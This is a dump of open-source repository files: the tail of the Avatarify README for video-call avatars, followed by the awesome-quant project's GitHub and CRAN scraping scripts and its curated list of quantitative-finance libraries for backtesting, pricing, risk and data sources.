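import cv2
from afy.predictor_local import PredictorLocal

def load_rgb_256(path):
    """Illustrative helper: read with OpenCV (BGR), convert to RGB, resize to 256x256."""
    img = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2RGB)
    return cv2.resize(img, (256, 256))

predictor = PredictorLocal(
    config_path='fomm/config/vox-adv-256.yaml',  # assumed config path
    checkpoint_path='vox-adv-cpk.pth.tar',       # assumed checkpoint file
    relative=True,
    adapt_movement_scale=True,
)
predictor.set_source_image(load_rgb_256('avatars/mona.png'))  # avatar to animate (example path)
out = predictor.predict(load_rgb_256('driving_frame.jpg'))    # returns a 256x256 RGB uint8 image
cv2.imwrite('out.png', out[..., ::-1])                        # convert back to BGR for imwrite
```

This is essentially what cam_fomm.py does for every webcam frame, minus the cropping, calibration, and virtual-camera streaming.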
![](docs/mona.gif) # Avatarify Python Photorealistic avatars for video-conferencing. Avatarify Python requires manually downloading and installing some dependencies, and is therefore best suited for users who have some experience with command line applications. [Avatarify Desktop](https://github.com/alievk/avatarify-desktop), which aims to be easier to install and use, is recommended for most users. If you still want to use Avatarify Python, proceed to the [install instructions](docs/). Based on [First Order Motion Model](https://github.com/AliaksandrSiarohin/first-order-model). ## News - **7 Mar 2021.** Renamed project to Avatarify Python to distinguish it from other versions of Avatarify - **14 December 2020.** Released Avatarify Desktop. Check it out [here](https://github.com/alievk/avatarify-desktop). - **11 July 2020.** Added Docker support. Now you can run Avatarify from Docker on [Linux](https://github.com/alievk/avatarify-python/blob/master/docs/README.md#docker). Thanks to [mikaelhg](https://github.com/mikaelhg) and [mintmaker](https://github.com/mintmaker) for contribution! - **22 May 2020.** Added [Google Colab](https://colab.research.google.com/github/alievk/avatarify/blob/master/avatarify.ipynb) mode. Now you can run Avatarify on any computer without GPU! - **7 May 2020.** Added remote GPU support for all platforms (based on [mynameisfiber's](https://github.com/mynameisfiber) solution). [Demo](https://youtu.be/3Dz_bUIPYFM). Deployment [instructions](https://github.com/alievk/avatarify-python/wiki/Remote-GPU). - **24 April 2020.** Added Windows installation [tutorial](https://www.youtube.com/watch?v=lym9ANVb120). - **17 April 2020.** Created Slack community. Please join via [invitation link](https://join.slack.com/t/avatarify/shared_invite/zt-dyoqy8tc-~4U2ObQ6WoxuwSaWKKVOgg). - **15 April 2020.** Added [StyleGAN-generated](https://www.thispersondoesnotexist.com) avatars. Just press `Q` and now you drive a person that never existed. Every time you push the button – new avatar is sampled. - **13 April 2020.** Added Windows support (kudos to [9of9](https://github.com/9of9)). ## Avatarify apps We have deployed Avatarify on iOS and Android devices using our proprietary inference engine. The iOS version features the Life mode for recording animations in real time. However, the Life mode is not available on Android devices due to the diversity of the devices we have to support. [<img src=docs/appstore-badge.png alt="drawing" height="40"/>](https://apps.apple.com/app/apple-store/id1512669147?pt=121960189&ct=GitHub&mt=8) [<img src=docs/google-play-badge.png alt="drawing" height="40"/>](https://play.google.com/store/apps/details?id=com.avatarify.android)
awesome-quant
2ab6db153bec32873c94aecb58ade6e1fb71b2c4
File: topic.py import os from github import Github # using an access token g = Github(os.environ['GITHUB_ACCESS_TOKEN']) # ts = g.search_topics('trading') # for t in ts: # print(t) # t = ts[0] # print(t) # print(t.name) # print(t.updated_at) # print(t.score) topic = 'quant' repos = g.search_repositories(query=f'topic:{topic}') for repo in repos: if repo.stargazers_count < 1000: break print(repo.name, repo.stargazers_count, repo.language, repo.html_url, repo.description, repo.updated_at, repo.archived) File: cranscrape.py import requests import re import pandas as pd reu = re.compile(r'https://github.com/([\w-]+/[\w-]+)') red = re.compile(r'\d\d\d\d-\d\d-\d\d') url = 'https://cran.r-project.org/web/packages/xts/index.html' urls = [ 'https://cran.r-project.org/web/packages/xts/index.html', 'https://cran.r-project.org/web/packages/data.table/index.html', 'https://cran.r-project.org/web/packages/tseries/index.html', 'https://cran.r-project.org/web/packages/zoo/index.html', 'https://cran.r-project.org/web/packages/tis/index.html', 'https://cran.r-project.org/web/packages/tfplot/index.html', 'https://cran.r-project.org/web/packages/tframe/index.html', 'https://cran.r-project.org/web/packages/IBrokers/index.html', 'https://cran.r-project.org/web/packages/Rblpapi/index.html', 'https://cran.r-project.org/web/packages/Rbitcoin/index.html', 'https://cran.r-project.org/web/packages/GetTDData/index.html', 'https://cran.r-project.org/web/packages/GetHFData/index.html', 'https://cran.r-project.org/package=td', 'https://cran.r-project.org/web/packages/quantmod/index.html', 'https://cran.r-project.org/web/packages/fAsianOptions/index.html', 'https://cran.r-project.org/web/packages/fAssets/index.html', 'https://cran.r-project.org/web/packages/fBasics/index.html', 'https://cran.r-project.org/web/packages/fBonds/index.html', 'https://cran.r-project.org/web/packages/fExoticOptions/index.html', 'https://cran.r-project.org/web/packages/fOptions/index.html', 'https://cran.r-project.org/web/packages/fPortfolio/index.html', 'https://cran.r-project.org/web/packages/portfolio/index.html', 'https://cran.r-project.org/web/packages/portfolioSim/index.html', 'https://cran.r-project.org/web/packages/sde/index.html', 'https://cran.r-project.org/web/packages/YieldCurve/index.html', 'https://cran.r-project.org/web/packages/SmithWilsonYieldCurve/index.html', 'https://cran.r-project.org/web/packages/ycinterextra/index.html', 'https://cran.r-project.org/web/packages/AmericanCallOpt/index.html', 'https://cran.r-project.org/web/packages/VarSwapPrice/index.html', 'https://cran.r-project.org/web/packages/RND/index.html', 'https://cran.r-project.org/web/packages/LSMonteCarlo/index.html', 'https://cran.r-project.org/web/packages/OptHedging/index.html', 'https://cran.r-project.org/web/packages/tvm/index.html', 'https://cran.r-project.org/web/packages/OptionPricing/index.html', 'https://cran.r-project.org/web/packages/credule/index.html', 'https://cran.r-project.org/web/packages/derivmkts/index.html', 'https://cran.r-project.org/web/packages/PortfolioAnalytics/PortfolioAnalytics.pdf', 'https://cran.r-project.org/web/packages/backtest/index.html', 'https://cran.r-project.org/web/packages/pa/index.html', 'https://cran.r-project.org/web/packages/TTR/index.html', 'https://cran.r-project.org/web/packages/PerformanceAnalytics/index.html', 'https://cran.r-project.org/web/packages/tseries/index.html', 'https://cran.r-project.org/web/packages/zoo/index.html', 'https://cran.r-project.org/web/packages/xts/index.html', 
'https://cran.r-project.org/web/packages/fGarch/index.html', 'https://cran.r-project.org/web/packages/timeSeries/index.html', 'https://cran.r-project.org/web/packages/rugarch/index.html', 'https://cran.r-project.org/web/packages/rmgarch/index.html', 'https://cran.r-project.org/web/packages/timeDate/index.html', 'https://cran.r-project.org/web/packages/bizdays/index.html', ] def get_data(url): res = requests.get(url) m = reu.search(res.text) if m: return dict(cran=url, github=m.group(0), repo=m.group(1)) else: return dict(cran=url, github='', repo='') all_data = [get_data(url) for url in urls] df = pd.DataFrame(all_data) df.to_csv('cran.csv', index=False) File: parse.py import os import re import pandas as pd from threading import Thread from github import Github # using an access token g = Github(os.environ['GITHUB_ACCESS_TOKEN']) def extract_repo(url): reu = re.compile(r'^https://github.com/([\w-]+/[-\w\.]+)$') m = reu.match(url) if m: return m.group(1) else: return '' def get_last_commit(repo): try: if repo: r = g.get_repo(repo) cs = r.get_commits() return cs[0].commit.author.date.strftime('%Y-%m-%d') else: return '' except: print('ERROR ' + repo) return 'error' class Project(Thread): def __init__(self, match, section): super().__init__() self._match = match self.regs = None self._section = section def run(self): m = self._match is_github = 'github.com' in m.group(2) is_cran = 'cran.r-project.org' in m.group(2) repo = extract_repo(m.group(2)) print(repo) last_commit = get_last_commit(repo) self.regs = dict( project=m.group(1), section=self._section, last_commit=last_commit, url=m.group(2), description=m.group(3), github=is_github, cran=is_cran, repo=repo ) projects = [] with open('README.md', 'r', encoding='utf8') as f: ret = re.compile(r'^(#+) (.*)$') rex = re.compile(r'^\s*- \[(.*)\]\((.*)\) - (.*)$') m_titles = [] last_head_level = 0 for line in f: m = rex.match(line) if m: p = Project(m, ' > '.join(m_titles[1:])) p.start() projects.append(p) else: m = ret.match(line) if m: hrs = m.group(1) if len(hrs) > last_head_level: m_titles.append(m.group(2)) else: for n in range(last_head_level - len(hrs) + 1): m_titles.pop() m_titles.append(m.group(2)) last_head_level = len(hrs) while True: checks = [not p.is_alive() for p in projects] if all(checks): break projects = [p.regs for p in projects] df = pd.DataFrame(projects) df.to_csv('site/projects.csv', index=False) # df.to_markdown('projects.md', index=False)
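`parse.py` above turns the README into `site/projects.csv` by matching every `- [name](url) - description` bullet with the regular expression `rex` and tracking the surrounding headings with `ret`. As a quick, self-contained illustration of that extraction step (no GitHub API calls, no threads), the snippet below applies the same bullet pattern to one real entry from the README; the variable names are only for the demo.

```py
import re

# The same bullet pattern parse.py uses to pull projects out of README.md.
rex = re.compile(r'^\s*- \[(.*)\]\((.*)\) - (.*)$')

line = ("- [backtrader](https://github.com/backtrader/backtrader) "
        "- Python Backtesting library for trading strategies.")

m = rex.match(line)
if m:
    project, url, description = m.groups()
    print(project)      # backtrader
    print(url)          # https://github.com/backtrader/backtrader
    print(description)  # Python Backtesting library for trading strategies.
```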
# Awesome Quant A curated list of insanely awesome libraries, packages and resources for Quants (Quantitative Finance). [![](https://awesome.re/badge.svg)](https://awesome.re) ## Languages - [Python](#python) - [R](#r) - [Matlab](#matlab) - [Julia](#julia) - [Java](#java) - [JavaScript](#javascript) - [Haskell](#haskell) - [Scala](#scala) - [Ruby](#ruby) - [Elixir/Erlang](#elixirerlang) - [Golang](#golang) - [CPP](#cpp) - [CSharp](#csharp) - [Rust](#rust) - [Frameworks](#frameworks) - [Reproducing Works](#reproducing-works) ## Python ### Numerical Libraries & Data Structures - [numpy](https://www.numpy.org) - NumPy is the fundamental package for scientific computing with Python. - [scipy](https://www.scipy.org) - SciPy (pronounced “Sigh Pie”) is a Python-based ecosystem of open-source software for mathematics, science, and engineering. - [pandas](https://pandas.pydata.org) - pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language. - [polars](https://docs.pola.rs/) - Polars is a blazingly fast DataFrame library for manipulating structured data. - [quantdsl](https://github.com/johnbywater/quantdsl) - Domain specific language for quantitative analytics in finance and trading. - [statistics](https://docs.python.org/3/library/statistics.html) - Builtin Python library for all basic statistical calculations. - [sympy](https://www.sympy.org/) - SymPy is a Python library for symbolic mathematics. - [pymc3](https://docs.pymc.io/) - Probabilistic Programming in Python: Bayesian Modeling and Probabilistic Machine Learning with Theano. - [modelx](https://docs.modelx.io/) - Python reimagination of spreadsheets as formula-centric objects that are interoperable with pandas. - [ArcticDB](https://github.com/man-group/ArcticDB) - High performance datastore for time series and tick data. ### Financial Instruments and Pricing - [OpenBB Terminal](https://github.com/OpenBB-finance/OpenBBTerminal) - Terminal for investment research for everyone. - [PyQL](https://github.com/enthought/pyql) - QuantLib's Python port. - [pyfin](https://github.com/opendoor-labs/pyfin) - Basic options pricing in Python. *ARCHIVED* - [vollib](https://github.com/vollib/vollib) - vollib is a python library for calculating option prices, implied volatility and greeks. - [QuantPy](https://github.com/jsmidt/QuantPy) - A framework for quantitative finance In python. - [Finance-Python](https://github.com/alpha-miner/Finance-Python) - Python tools for Finance. - [ffn](https://github.com/pmorissette/ffn) - A financial function library for Python. - [pynance](https://github.com/GriffinAustin/pynance) - Lightweight Python library for assembling and analyzing financial data. - [tia](https://github.com/bpsmith/tia) - Toolkit for integration and analysis. - [hasura/base-python-dash](https://platform.hasura.io/hub/projects/hasura/base-python-dash) - Hasura quick start to deploy Dash framework. Written on top of Flask, Plotly.js, and React.js, Dash is ideal for building data visualization apps with highly custom user interfaces in pure Python. - [hasura/base-python-bokeh](https://platform.hasura.io/hub/projects/hasura/base-python-bokeh) - Hasura quick start to visualize data with bokeh library. - [pysabr](https://github.com/ynouri/pysabr) - SABR model Python implementation. 
- [FinancePy](https://github.com/domokane/FinancePy) - A Python Finance Library that focuses on the pricing and risk-management of Financial Derivatives, including fixed-income, equity, FX and credit derivatives. - [gs-quant](https://github.com/goldmansachs/gs-quant) - Python toolkit for quantitative finance - [willowtree](https://github.com/federicomariamassari/willowtree) - Robust and flexible Python implementation of the willow tree lattice for derivatives pricing. - [financial-engineering](https://github.com/federicomariamassari/financial-engineering) - Applications of Monte Carlo methods to financial engineering projects, in Python. - [optlib](https://github.com/dbrojas/optlib) - A library for financial options pricing written in Python. - [tf-quant-finance](https://github.com/google/tf-quant-finance) - High-performance TensorFlow library for quantitative finance. - [Q-Fin](https://github.com/RomanMichaelPaolucci/Q-Fin) - A Python library for mathematical finance. - [Quantsbin](https://github.com/quantsbin/Quantsbin) - Tools for pricing and plotting of vanilla option prices, greeks and various other analysis around them. - [finoptions](https://github.com/bbcho/finoptions-dev) - Complete python implementation of R package fOptions with partial implementation of fExoticOptions for pricing various options. - [pypme](https://github.com/ymyke/pypme) - PME (Public Market Equivalent) calculation. - [AbsBox](https://github.com/yellowbean/AbsBox) - A Python based library to model cashflow for structured product like Asset-backed securities (ABS) and Mortgage-backed securities (MBS). - [Intrinsic-Value-Calculator](https://github.com/akashaero/Intrinsic-Value-Calculator) - A Python tool for quick calculations of a stock's fair value using Discounted Cash Flow analysis. - [Kelly-Criterion](https://github.com/deltaray-io/kelly-criterion) - Kelly Criterion implemented in Python to size portfolios based on J. L. Kelly Jr's formula. - [rateslib](https://github.com/attack68/rateslib) - A fixed income library for pricing bonds and bond futures, and derivatives such as IRS, cross-currency and FX swaps. ### Indicators - [pandas_talib](https://github.com/femtotrader/pandas_talib) - A Python Pandas implementation of technical analysis indicators. - [finta](https://github.com/peerchemist/finta) - Common financial technical analysis indicators implemented in Pandas. - [Tulipy](https://github.com/cirla/tulipy) - Financial Technical Analysis Indicator Library (Python bindings for [tulipindicators](https://github.com/TulipCharts/tulipindicators)) - [lppls](https://github.com/Boulder-Investment-Technologies/lppls) - A Python module for fitting the [Log-Periodic Power Law Singularity (LPPLS)](https://en.wikipedia.org/wiki/Didier_Sornette#The_JLS_and_LPPLS_models) model. - [talipp](https://github.com/nardew/talipp) - Incremental technical analysis library for Python. - [streaming_indicators](https://github.com/mr-easy/streaming_indicators) - A python library for computing technical analysis indicators on streaming data. ### Trading & Backtesting - [skfolio](https://github.com/skfolio/skfolio) - Python library for portfolio optimization built on top of scikit-learn. It provides a unified interface and sklearn compatible tools to build, tune and cross-validate portfolio models. - [Investing algorithm framework](https://github.com/coding-kitties/investing-algorithm-framework) - Framework for developing, backtesting, and deploying automated trading algorithms. 
- [QSTrader](https://github.com/mhallsmoore/qstrader) - QSTrader backtesting simulation engine. - [Blankly](https://github.com/Blankly-Finance/Blankly) - Fully integrated backtesting, paper trading, and live deployment. - [TA-Lib](https://github.com/mrjbq7/ta-lib) - Python wrapper for TA-Lib (<http://ta-lib.org/>). - [zipline](https://github.com/quantopian/zipline) - Pythonic algorithmic trading library. - [QuantSoftware Toolkit](https://github.com/QuantSoftware/QuantSoftwareToolkit) - Python-based open source software framework designed to support portfolio construction and management. - [quantitative](https://github.com/jeffrey-liang/quantitative) - Quantitative finance, and backtesting library. - [analyzer](https://github.com/llazzaro/analyzer) - Python framework for real-time financial and backtesting trading strategies. - [bt](https://github.com/pmorissette/bt) - Flexible Backtesting for Python. - [backtrader](https://github.com/backtrader/backtrader) - Python Backtesting library for trading strategies. - [pythalesians](https://github.com/thalesians/pythalesians) - Python library to backtest trading strategies, plot charts, seamlessly download market data, analyze market patterns etc. - [pybacktest](https://github.com/ematvey/pybacktest) - Vectorized backtesting framework in Python / pandas, designed to make your backtesting easier. - [pyalgotrade](https://github.com/gbeced/pyalgotrade) - Python Algorithmic Trading Library. - [basana](https://github.com/gbeced/basana) - A Python async and event driven framework for algorithmic trading, with a focus on crypto currencies. - [tradingWithPython](https://pypi.org/project/tradingWithPython/) - A collection of functions and classes for Quantitative trading. - [Pandas TA](https://github.com/twopirllc/pandas-ta) - Pandas TA is an easy to use Python 3 Pandas Extension with 115+ Indicators. Easily build Custom Strategies. - [ta](https://github.com/bukosabino/ta) - Technical Analysis Library using Pandas (Python) - [algobroker](https://github.com/joequant/algobroker) - This is an execution engine for algo trading. - [pysentosa](https://pypi.org/project/pysentosa/) - Python API for sentosa trading system. - [finmarketpy](https://github.com/cuemacro/finmarketpy) - Python library for backtesting trading strategies and analyzing financial markets. - [binary-martingale](https://github.com/metaperl/binary-martingale) - Computer program to automatically trade binary options martingale style. - [fooltrader](https://github.com/foolcage/fooltrader) - the project using big-data technology to provide an uniform way to analyze the whole market. - [zvt](https://github.com/zvtvz/zvt) - the project using sql, pandas to provide an uniform and extendable way to record data, computing factors, select securities, backtesting, realtime trading and it could show all of them in clearly charts in realtime. - [pylivetrader](https://github.com/alpacahq/pylivetrader) - zipline-compatible live trading library. - [pipeline-live](https://github.com/alpacahq/pipeline-live) - zipline's pipeline capability with IEX for live trading. - [zipline-extensions](https://github.com/quantrocket-llc/zipline-extensions) - Zipline extensions and adapters for QuantRocket. - [moonshot](https://github.com/quantrocket-llc/moonshot) - Vectorized backtester and trading engine for QuantRocket based on Pandas. - [PyPortfolioOpt](https://github.com/robertmartin8/PyPortfolioOpt) - Financial portfolio optimization in python, including classical efficient frontier and advanced methods. 
- [Eiten](https://github.com/tradytics/eiten) - Eiten is an open source toolkit by Tradytics that implements various statistical and algorithmic investing strategies such as Eigen Portfolios, Minimum Variance Portfolios, Maximum Sharpe Ratio Portfolios, and Genetic Algorithms based Portfolios. - [riskparity.py](https://github.com/dppalomar/riskparity.py) - fast and scalable design of risk parity portfolios with TensorFlow 2.0 - [mlfinlab](https://github.com/hudson-and-thames/mlfinlab) - Implementations regarding "Advances in Financial Machine Learning" by Marcos Lopez de Prado. (Feature Engineering, Financial Data Structures, Meta-Labeling) - [pyqstrat](https://github.com/abbass2/pyqstrat) - A fast, extensible, transparent python library for backtesting quantitative strategies. - [NowTrade](https://github.com/edouardpoitras/NowTrade) - Python library for backtesting technical/mechanical strategies in the stock and currency markets. - [pinkfish](https://github.com/fja05680/pinkfish) - A backtester and spreadsheet library for security analysis. - [aat](https://github.com/timkpaine/aat) - Async Algorithmic Trading Engine - [Backtesting.py](https://kernc.github.io/backtesting.py/) - Backtest trading strategies in Python - [catalyst](https://github.com/enigmampc/catalyst) - An Algorithmic Trading Library for Crypto-Assets in Python - [quantstats](https://github.com/ranaroussi/quantstats) - Portfolio analytics for quants, written in Python - [qtpylib](https://github.com/ranaroussi/qtpylib) - QTPyLib, Pythonic Algorithmic Trading <http://qtpylib.io> - [Quantdom](https://github.com/constverum/Quantdom) - Python-based framework for backtesting trading strategies & analyzing financial markets [GUI :neckbeard:] - [freqtrade](https://github.com/freqtrade/freqtrade) - Free, open source crypto trading bot - [algorithmic-trading-with-python](https://github.com/chrisconlan/algorithmic-trading-with-python) - Free `pandas` and `scikit-learn` resources for trading simulation, backtesting, and machine learning on financial data. - [DeepDow](https://github.com/jankrepl/deepdow) - Portfolio optimization with deep learning - [Qlib](https://github.com/microsoft/qlib) - An AI-oriented Quantitative Investment Platform by Microsoft. Full ML pipeline of data processing, model training, back-testing; and covers the entire chain of quantitative investment: alpha seeking, risk modeling, portfolio optimization, and order execution. - [machine-learning-for-trading](https://github.com/stefan-jansen/machine-learning-for-trading) - Code and resources for Machine Learning for Algorithmic Trading - [AlphaPy](https://github.com/ScottfreeLLC/AlphaPy) - Automated Machine Learning [AutoML] with Python, scikit-learn, Keras, XGBoost, LightGBM, and CatBoost - [jesse](https://github.com/jesse-ai/jesse) - An advanced crypto trading bot written in Python - [rqalpha](https://github.com/ricequant/rqalpha) - A extendable, replaceable Python algorithmic backtest && trading framework supporting multiple securities. - [FinRL-Library](https://github.com/AI4Finance-LLC/FinRL-Library) - A Deep Reinforcement Learning Library for Automated Trading in Quantitative Finance. NeurIPS 2020. - [bulbea](https://github.com/achillesrasquinha/bulbea) - Deep Learning based Python Library for Stock Market Prediction and Modelling. - [ib_nope](https://github.com/ajhpark/ib_nope) - Automated trading system for NOPE strategy over IBKR TWS. 
- [OctoBot](https://github.com/Drakkar-Software/OctoBot) - Open source cryptocurrency trading bot for high frequency, arbitrage, TA and social trading with an advanced web interface. - [bta-lib](https://github.com/mementum/bta-lib) - Technical Analysis library in pandas for backtesting algotrading and quantitative analysis. - [Stock-Prediction-Models](https://github.com/huseinzol05/Stock-Prediction-Models) - Gathers machine learning and deep learning models for Stock forecasting including trading bots and simulations. - [TuneTA](https://github.com/jmrichardson/tuneta) - TuneTA optimizes technical indicators using a distance correlation measure to a user defined target feature such as next day return. - [AutoTrader](https://github.com/kieran-mackle/AutoTrader) - A Python-based development platform for automated trading systems - from backtesting to optimization to livetrading. - [fast-trade](https://github.com/jrmeier/fast-trade) - A library built with backtest portability and performance in mind for backtest trading strategies. - [qf-lib](https://github.com/quarkfin/qf-lib) - QF-Lib is a Python library that provides high quality tools for quantitative finance. - [tda-api](https://github.com/alexgolec/tda-api) - Gather data and trade equities, options, and ETFs via TDAmeritrade. - [vectorbt](https://github.com/polakowo/vectorbt) - Find your trading edge, using a powerful toolkit for backtesting, algorithmic trading, and research. - [Lean](https://github.com/QuantConnect/Lean) - Lean Algorithmic Trading Engine by QuantConnect (Python, C#). - [fast-trade](https://github.com/jrmeier/fast-trade) - Low code backtesting library utilizing pandas and technical analysis indicators. - [pysystemtrade](https://github.com/robcarver17/pysystemtrade) - pysystemtrade is the open source version of Robert Carver's backtesting and trading engine that implements systems according to the framework outlined in his book "Systematic Trading", which is further developed on his [blog](https://qoppac.blogspot.com/). - [pytrendseries](https://github.com/rafa-rod/pytrendseries) - Detect trend in time series, drawdown, drawdown within a constant look-back window , maximum drawdown, time underwater. - [PyLOB](https://github.com/DrAshBooth/PyLOB) - Fully functioning fast Limit Order Book written in Python. - [PyBroker](https://github.com/edtechre/pybroker) - Algorithmic Trading with Machine Learning. - [OctoBot Script](https://github.com/Drakkar-Software/OctoBot-Script) - A quant framework to create cryptocurrencies strategies - from backtesting to optimization to livetrading. - [hftbacktest](https://github.com/nkaz001/hftbacktest) - A high-frequency trading and market-making backtesting tool accounts for limit orders, queue positions, and latencies, utilizing full tick data for trades and order books. - [vnpy](https://github.com/vnpy/vnpy) - VeighNa is a Python-based open source quantitative trading system development framework. - [Intelligent Trading Bot](https://github.com/asavinov/intelligent-trading-bot) - Automatically generating signals and trading based on machine learning and feature engineering - [fastquant](https://github.com/enzoampil/fastquant) - fastquant allows you to easily backtest investment strategies with as few as 3 lines of python code. - [nautilus_trader](https://github.com/nautechsystems/nautilus_trader) - A high-performance algorithmic trading platform and event-driven backtester. - [YABTE](https://github.com/bsdz/yabte) - Yet Another (Python) BackTesting Engine. 
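Many of the backtesting entries above (pybacktest, vectorbt, Pandas TA, and others) are built around the same vectorized idea: represent prices, signals, and positions as whole pandas Series rather than looping over bars. The sketch below illustrates that general pattern on synthetic data with plain pandas/NumPy; it is not taken from, and does not depend on, any of the listed libraries.

```py
import numpy as np
import pandas as pd

# Synthetic daily closes (geometric random walk), purely for illustration.
rng = np.random.default_rng(0)
close = pd.Series(
    100 * np.exp(np.cumsum(rng.normal(0, 0.01, 500))),
    index=pd.date_range("2020-01-01", periods=500, freq="B"),
)

fast = close.rolling(20).mean()
slow = close.rolling(50).mean()

# Hold a long position while the fast average is above the slow one;
# shift by one bar so today's signal is only traded tomorrow (no look-ahead).
position = (fast > slow).astype(int).shift(1).fillna(0)

returns = close.pct_change().fillna(0)
strategy_returns = position * returns

equity_curve = (1 + strategy_returns).cumprod()
print(f"Final equity multiple: {equity_curve.iloc[-1]:.2f}")
```

Real frameworks layer transaction costs, position sizing, and proper data handling on top of this core, but the Series-at-a-time structure is the common thread.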
### Risk Analysis - [QuantLibRisks](https://github.com/auto-differentiation/QuantLib-Risks-Py) - Fast risks with QuantLib - [XAD](https://github.com/auto-differentiation/xad-py) - Automatic Differentation (AAD) Library - [pyfolio](https://github.com/quantopian/pyfolio) - Portfolio and risk analytics in Python. - [empyrical](https://github.com/quantopian/empyrical) - Common financial risk and performance metrics. - [fecon235](https://github.com/rsvp/fecon235) - Computational tools for financial economics include: Gaussian Mixture model of leptokurtotic risk, adaptive Boltzmann portfolios. - [finance](https://pypi.org/project/finance/) - Financial Risk Calculations. Optimized for ease of use through class construction and operator overload. - [qfrm](https://pypi.org/project/qfrm/) - Quantitative Financial Risk Management: awesome OOP tools for measuring, managing and visualizing risk of financial instruments and portfolios. - [visualize-wealth](https://github.com/benjaminmgross/visualize-wealth) - Portfolio construction and quantitative analysis. - [VisualPortfolio](https://github.com/wegamekinglc/VisualPortfolio) - This tool is used to visualize the performance of a portfolio. - [universal-portfolios](https://github.com/Marigold/universal-portfolios) - Collection of algorithms for online portfolio selection. - [FinQuant](https://github.com/fmilthaler/FinQuant) - A program for financial portfolio management, analysis and optimization. - [Empyrial](https://github.com/ssantoshp/Empyrial) - Portfolio's risk and performance analytics and returns predictions. - [risktools](https://github.com/bbcho/risktools-dev) - Risk tools for use within the crude and crude products trading space with partial implementation of R's PerformanceAnalytics. - [Riskfolio-Lib](https://github.com/dcajasn/Riskfolio-Lib) - Portfolio Optimization and Quantitative Strategic Asset Allocation in Python. - [empyrical-reloaded](https://github.com/stefan-jansen/empyrical-reloaded) - Common financial risk and performance metrics. [empyrical](https://github.com/quantopian/empyrical) fork. - [pyfolio-reloaded](https://github.com/stefan-jansen/pyfolio-reloaded) - Portfolio and risk analytics in Python. [pyfolio](https://github.com/quantopian/pyfolio) fork. - [fortitudo.tech](https://github.com/fortitudo-tech/fortitudo.tech) - Conditional Value-at-Risk (CVaR) portfolio optimization and Entropy Pooling views / stress-testing in Python. ### Factor Analysis - [alphalens](https://github.com/quantopian/alphalens) - Performance analysis of predictive alpha factors. - [Spectre](https://github.com/Heerozh/spectre) - GPU-accelerated Factors analysis library and Backtester ### Sentiment Analysis - [Asset News Sentiment Analyzer](https://github.com/KVignesh122/AssetNewsSentimentAnalyzer) - Sentiment analysis and report generation package for financial assets and securities utilizing GPT models. ### Quant Research Environment - [Jupyter Quant](https://github.com/gnzsnz/jupyter-quant) - A dockerized Jupyter quant research environment with preloaded tools for quant analysis, statsmodels, pymc, arch, py_vollib, zipline-reloaded, PyPortfolioOpt, etc. ### Time Series - [ARCH](https://github.com/bashtage/arch) - ARCH models in Python. - [statsmodels](http://statsmodels.sourceforge.net) - Python module that allows users to explore data, estimate statistical models, and perform statistical tests. - [dynts](https://github.com/quantmind/dynts) - Python package for timeseries analysis and manipulation. 
- [PyFlux](https://github.com/RJT1990/pyflux) - Python library for timeseries modelling and inference (frequentist and Bayesian) on models. - [tsfresh](https://github.com/blue-yonder/tsfresh) - Automatic extraction of relevant features from time series. - [hasura/quandl-metabase](https://platform.hasura.io/hub/projects/anirudhm/quandl-metabase-time-series) - Hasura quickstart to visualize Quandl's timeseries datasets with Metabase. - [Facebook Prophet](https://github.com/facebook/prophet) - Tool for producing high quality forecasts for time series data that has multiple seasonality with linear or non-linear growth. - [tsmoothie](https://github.com/cerlymarco/tsmoothie) - A python library for time-series smoothing and outlier detection in a vectorized way. - [pmdarima](https://github.com/alkaline-ml/pmdarima) - A statistical library designed to fill the void in Python's time series analysis capabilities, including the equivalent of R's auto.arima function. - [gluon-ts](https://github.com/awslabs/gluon-ts) - vProbabilistic time series modeling in Python. ### Calendars - [exchange_calendars](https://github.com/gerrymanoim/exchange_calendars) - Stock Exchange Trading Calendars. - [bizdays](https://github.com/wilsonfreitas/python-bizdays) - Business days calculations and utilities. - [pandas_market_calendars](https://github.com/rsheftel/pandas_market_calendars) - Exchange calendars to use with pandas for trading applications. ### Data Sources - [yfinance](https://github.com/ranaroussi/yfinance) - Yahoo! Finance market data downloader (+faster Pandas Datareader) - [findatapy](https://github.com/cuemacro/findatapy) - Python library to download market data via Bloomberg, Quandl, Yahoo etc. - [googlefinance](https://github.com/hongtaocai/googlefinance) - Python module to get real-time stock data from Google Finance API. - [yahoo-finance](https://github.com/lukaszbanasiak/yahoo-finance) - Python module to get stock data from Yahoo! Finance. - [pandas-datareader](https://github.com/pydata/pandas-datareader) - Python module to get data from various sources (Google Finance, Yahoo Finance, FRED, OECD, Fama/French, World Bank, Eurostat...) into Pandas datastructures such as DataFrame, Panel with a caching mechanism. - [pandas-finance](https://github.com/davidastephens/pandas-finance) - High level API for access to and analysis of financial data. - [pyhoofinance](https://github.com/innes213/pyhoofinance) - Rapidly queries Yahoo Finance for multiple tickers and returns typed data for analysis. - [yfinanceapi](https://github.com/Karthik005/yfinanceapi) - Finance API for Python. - [yql-finance](https://github.com/slawek87/yql-finance) - yql-finance is simple and fast. API returns stock closing prices for current period of time and current stock ticker (i.e. APPL, GOOGL). - [ystockquote](https://github.com/cgoldberg/ystockquote) - Retrieve stock quote data from Yahoo Finance. - [wallstreet](https://github.com/mcdallas/wallstreet) - Real time stock and option data. - [stock_extractor](https://github.com/ZachLiuGIS/stock_extractor) - General Purpose Stock Extractors from Online Resources. - [Stockex](https://github.com/cttn/Stockex) - Python wrapper for Yahoo! Finance API. - [finsymbols](https://github.com/skillachie/finsymbols) - Obtains stock symbols and relating information for SP500, AMEX, NYSE, and NASDAQ. - [FRB](https://github.com/avelkoski/FRB) - Python Client for FRED® API. - [inquisitor](https://github.com/econdb/inquisitor) - Python Interface to Econdb.com API. 
